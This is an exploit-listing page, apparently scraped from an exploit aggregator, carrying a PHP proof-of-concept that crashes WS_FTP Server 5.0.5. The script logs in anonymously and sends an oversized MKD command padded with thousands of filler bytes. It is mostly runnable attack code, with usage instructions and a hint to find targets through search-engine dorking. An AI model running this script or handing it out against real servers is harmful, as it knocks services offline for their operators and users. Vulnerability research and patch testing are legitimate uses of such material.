Exploit for WS FTP Server 5.0.5 Denial of Service

Name: Exploit for WS FTP Server 5.0.5 Denial of Service
Rating: 5 (28 reviews)
2025-03-11 | CVSS 7.2
## https://sploitus.com/exploit?id=PACKETSTORM:189693
=============================================================================================================================================
    | # Title     : WS FTP Server 5.0.5 - Denied of Service vulnerability                                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://ws-ftp-le.software.informer.com/5.0/                                                                                |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code is for WS_FTP Server 5.0.5 and represents a Denial of Service (DoS) attack.
    
       (Related : https://packetstorm.news/files/id/176847/ Linked CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage = C:\www>php 2.php 127.0.0.1 21
    
    [+] PayLoad :
    
    <?php
    // Exploit Title: WS_FTP Server 5.0.5 - Denied of Service (DoS)
    
    function intro() {
      echo "\n-------------------------------------------------------------------------\n";
        echo "--------------- [+] WS_FTP Server 5.0.5 - Denied of Service (DoS)  ----\n";
        echo "----------------------------indoushka------------------------------------\n";
    }
    
    function main() {
        global $argv;
        
        if (count($argv) < 3) {
            echo "Usage: php script.php <ip> <port>\n";
            exit(-1);
        }
    
        $ip = $argv[1];
        $port = $argv[2];
    
        $exploit = str_repeat("\x41", 676); // Fill with A's
        $exploit .= "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"; // Exploit payload
        $exploit .= str_repeat("\x42", 3000); // Additional padding
        $exploit .= "\r\n";
    
        // إنشاء الاتصال بالخادم
        $sock = fsockopen($ip, $port, $errno, $errstr, 30);
        if (!$sock) {
            echo "[-] Not connected to $ip:$port: $errstr\n";
            exit(0);
        }
    
        // قراءة استجابة الخادم
        $response = fread($sock, 1024);
        echo "Connected => $response\n";
    
        // إرسال بيانات التوثيق
        fwrite($sock, "USER anonymous\r\n");
        $response = fread($sock, 1024);
        echo "Authentication USER: $response\n";
    
        fwrite($sock, "PASS anonymous\r\n");
        $response = fread($sock, 1024);
        echo "Authentication PASSWORD: $response\n";
    
        // إرسال الحمولة لاستغلال الثغرة
        fwrite($sock, "MKD " . $exploit);
        $response = fread($sock, 1024);
        echo "Exploited: $response\n";
    
        fclose($sock);
    }
    
    // بداية التنفيذ
    intro();
    main();
    ?>
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================